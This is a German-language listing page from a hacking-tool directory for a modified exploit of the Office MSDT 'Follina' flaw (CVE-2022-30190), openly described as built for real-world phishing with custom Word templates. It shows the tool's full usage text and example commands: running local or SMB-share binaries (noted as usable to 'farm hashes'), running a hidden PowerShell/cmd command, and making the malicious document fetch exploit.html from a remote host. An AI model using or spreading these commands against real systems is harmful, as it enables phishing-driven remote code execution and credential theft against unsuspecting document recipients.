Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-30190-follina-Office-MSDT-Fixed — CVE-2022-30190-follina.py-modifizierte Version, kann eine benutzerdefinierte Word-Vorlage verwenden, erleichtert den Einsatz beim Phishing in der Praxis. | Kitploit
Tools/GitHubGitHub/komomon/cve-2022-30190-follina-office-msdt-fixed
Phishing-ToolsPayload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubkomomon/cve-2022-30190-follina-office-msdt-fixed

CVE-2022-30190-follina-Office-MSDT-Fixed

CVE-2022-30190-follina.py-modifizierte Version, kann eine benutzerdefinierte Word-Vorlage verwenden, erleichtert den Einsatz beim Phishing in der Praxis.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite
39052vor 3 JahrenVon Kitploit geprüft

'Follina' MS-MSDT n-day Microsoft Office RCE — Modifizierte Version

Basierend auf dem Projekt von https://github.com/chvancooten/follina.py modifiziert, um benutzerdefinierte DOCX-Vorlagendateien angeben zu können, was die Verwendung beim Phishing erleichtert. Nachdem Sie Ihr eigenes Phishing-Word-Dokument bearbeitet haben, geben Sie es einfach mit dem Parameter -f an.

Usage:

root@kitploit:~
usage: follina.py [-h] -m {binary,command} [-b BINARY] [-f FILE] [-c COMMAND] [-u URL] [-H HOST] [-P PORT]

optional arguments:
  -h, --help            show this help message and exit

Required Arguments:
  -m {binary,command}, --mode {binary,command}
                        Ausführungsmodus, kann "binary" zum Laden einer (entfernten) Binärdatei oder "command" zum Ausführen eines verschlüsselten PS-Befehls sein

Binary Execution Arguments:
  -b BINARY, --binary BINARY
                        Der vollständige Pfad der auszuführenden Binärdatei. Kann lokal oder remote über eine SMB-Freigabe sein

Docx file Arguments:
  -f FILE, --file FILE  Die DOCX-Datei

Command Execution Arguments:
  -c COMMAND, --command COMMAND
                        Der verschlüsselte Befehl, der im "command"-Modus ausgeführt werden soll

Optional Arguments:
  -u URL, --url URL     Der Hostname oder die IP-Adresse, von der das generierte Dokument Ihre Payload abrufen soll, standardmäßig "localhost"
  -H HOST, --host HOST  Das Interface, auf dem der Webserver lauschen soll, standardmäßig alle Interfaces (0.0.0.0)
  -P PORT, --port PORT  Der Port, auf dem der HTTP-Server laufen soll, standardmäßig 80

Examples:

root@kitploit:~
默认docx muban.docx
# Execute a local binary
python .\follina.py -m binary -b \windows\system32\calc.exe
python .\follina.py -m binary -b \windows\system32\calc.exe -f muban2.docx

# On linux you may have to escape backslashes
python .\follina.py -m binary -b \\windows\\system32\\calc.exe

# Execute a binary from a file share (can be used to farm hashes 👀)
python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe

# Execute an arbitrary powershell command
python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"

# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -m binary -b \windows\system32\calc.exe -u 1.2.3.4

# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080

image-20220602201236509

image-20220602201350939

Gemeinsam austauschen

Interessierte können dem Z2O安全攻防 öffentlichen Konto folgen und „加群“ antworten, um Z2OBot Xiao K hinzuzufügen. Der Bot lädt Sie automatisch in die Z2O安全攻防 Austauschgruppe ein, um weitere gute Inhalte zu teilen.

image-20220427110933992

公众号

Z2Oqq二维码4-16814031792311

Das Team hat eine Wissensplaneten-Sparte gegründet, in der in unregelmäßigen Abständen die neuesten Exploit-Reproduktionen veröffentlicht werden. Schritt-für-Schritt-Anleitungen werden bereitgestellt, und gelegentlich werden POCs sowie ausgefallene Methoden für interne und externe Penetrationstests geteilt. Interessierte können gerne beitreten.

image-20220427111016139

图片

图片

image-20230414002829568

Willkommen star⭐ O(∩_∩)O

Tool herunterladen